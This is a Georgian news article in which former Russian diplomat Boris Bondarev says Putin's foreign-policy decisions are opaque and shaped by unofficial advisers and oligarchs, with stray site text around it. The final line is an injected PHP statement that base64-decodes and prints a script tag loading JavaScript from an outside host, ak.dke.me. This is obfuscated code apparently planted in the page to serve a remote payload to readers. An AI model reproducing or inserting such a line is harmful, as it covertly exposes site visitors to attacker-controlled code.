celsiusi
ავერსი საქკაბელი
რუსი დიპლომატი, ბორის ბონდარევის განცხადებით, რუსეთს პრეზიდენტი, ვლადიმერ პუტინი რის საფუძველზე და ვისი გავლენით ღებულობს გადაწყვეტილებებს, ეს გაუგებარი და გაუმჭვირვალეა. 
 
როგორც „რადიო მაესტროსთან“ ექსკლუზიურ ინტერვიუში  ბორის ბონდარევმა განაცხადა, რომელმაც  გაერო-ში რუსეთის წარმომადგენლობის ჟენევის მრჩევლის თანამდებობა რამდენიმე თვის წინ, უკრაინაში მიმდინარე ომის გამო პროტესტის ნიშნად დატოვა,   პუტინი ვისგან იღებს რჩევებს და ვისთან აქვს კომუნიკაციები არავინ იცის. 
 
ჟურნალისტის კითხვაზე: თუ ვინ და რა ჯგუფი აკეთებს რუსეთის საგარეო პოლიტიკას, მან უპასუხა, რომ თავადაც ისურვებდა გაეგო ამ კითხვის პასუხი.
 
„თავადაც ვისურვებდი ამ კითხვაზე პასუხი გამეგო. როგორც იცით, კონსტიტუციით რუსეთის საგარეო პოლიტიკას განსაზღვრავს პრეზიდენტი, რომლის რეალიზებას ახდენს რუსეთის საგარეო საქმეთა სამინისტრო. პრეზიდენტი როგორ განსაზღვრავს, რის საფუძველზე და ვისი გავლენით ღებულობს გადაწყვეტილებებს, ეს გაუგებარი და გაუმჭვირვალეა. ჩვენ არ ვიცით, პრეზიდენტი პუტინი ვისგან იღებს რჩევებს, ვისთან აქვს კომუნიკაციები. ეჭვი მაქვს, რომ ისეთი ადამიანები აძლევენ რჩევებს, რომლებიც არცერთ თანამდებობას არ იკავებენ, ასეთი ადამინები შეიძლება იყვნენ უბრალოდ მისი მეგობრები და ნაცნობები. საგარეო გადაწყვეტილებების ნაწილი, ვიცი რომ გარკვეული ფინანსური ჯგუფების მიერ იყო ნაკარნახები, მხედველობაში მყავს ოლიგარქები. არის ისეთი გადაწყვეტილებები, რომლსაც საერთოდ ვერ გაიგებ, ვის მიერ და საერთოდ რატომ მიიღებოდა. აი მაგალითად, როდესაც ლავროვმა გააკეთა განცხადება, რომ ჰიტლერი იყო ებრაელი, რისთვის გაკეთდა ეს განცხადება, ვინმემ იცის? ამ განცხადენის გამო პუტინი რეკავს ისრაელის პრემიერთან და ებოდიშება. მსგავსი შემთხვევები არაერთი ყოფილა, შემთხვევები, რის შემდეგაც უბრალოდ გიჩნდებოდა კითხვა, აი რატომ? აი რისთვის? ვინ გექაჩებოდა ენაზე? უფრო კონკრეტულად მე ვერ ვპასუხობ თქვენს კითხვას, რადგან თავადაც არ ვიცი რა ჯგუფი აკეთებს დღეს საგარეო პოლიტიკას რუსეთში“, – აღნიშნა მან. 
 
მისივე თქმით, ლავროვი არ ქმნის საგარეო პოლიტიკას, ლავროვი უბრალოდ ასრულებს იმას, რასაც ზევიდან ეუბნებიან.
 
„თუ დრო გვაქვთ მინდა ერთი მაგალითი მოგიყვანოთ: გასული წლის დეკემბერში ჟენევაში მივიღეთ ხელშეკრულებების პროექტები ნატოსთან და ამერიკის შეერთებულ შტატებთან უსაფრთხოების გარანტიების მიღებაზე. თქვენ გემახსოვრებათ ამ ისტორიის შესახებ, ჩვენ ვერ ვიგებდით, ხელშეკრულებების პროექტები საიდან მოდიოდა, საგარეო საქმეთა სამინისტრო საქმის კურსში არ იყო, როცა ვეკითხებოდით, გვპასუხობდნენ რომ დოკუმენტაცია პრეზიდენტის ადმინისტრაციიდან მოდიოდა, მაგრამ ვინ მოიფიქრა, ვინ მოიგონა ეს დოკუმენტი არავინ ვიცით. რომ წაგეკითხათ ეს დოკუმენტი, ნებისმიერი მიხვდებოდა, თუ რამდენად მიუღწევადი იყო იქ გაწერილი პუნქტები. უბრალოდ, ვიღაცამ მოიფიქრა ეს დოკუმენტი, გამოაგზავნა და თქვა, მიდით, ნატოსთან და აშშ-თან აღნიშნულზე მიაღწიეთ შეთანხმებას. აბსოლუტურად არაპროფესიონალიზმი იყო ეს ყველაფერი, იმდენად გაუთვლელი ნაბიჯი იყო, ვფიქრობ, რომ თავად პუტინმა მოიფიქრა ეს, თავის თანაშემწეებს უთხრა მსგავსი დოკუმენტი მოემზადებინათ და შემდეგ პირდაპირ ჟენევაში გამოეგზავნათ. იმდენად წარმოუდგენელი რამ ეწერა,რომ დღეს ამ დოკუმენტს  არავინ იხსენებს“, – განაცხადა  ბონდარევმა. 
 
ვრცლადი ინტერვიუ შეგიძლიათ მოისმინოთ შემდეგ ბმულზე: https://fb.watch/fRaZJrP5Ux/
 
682
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");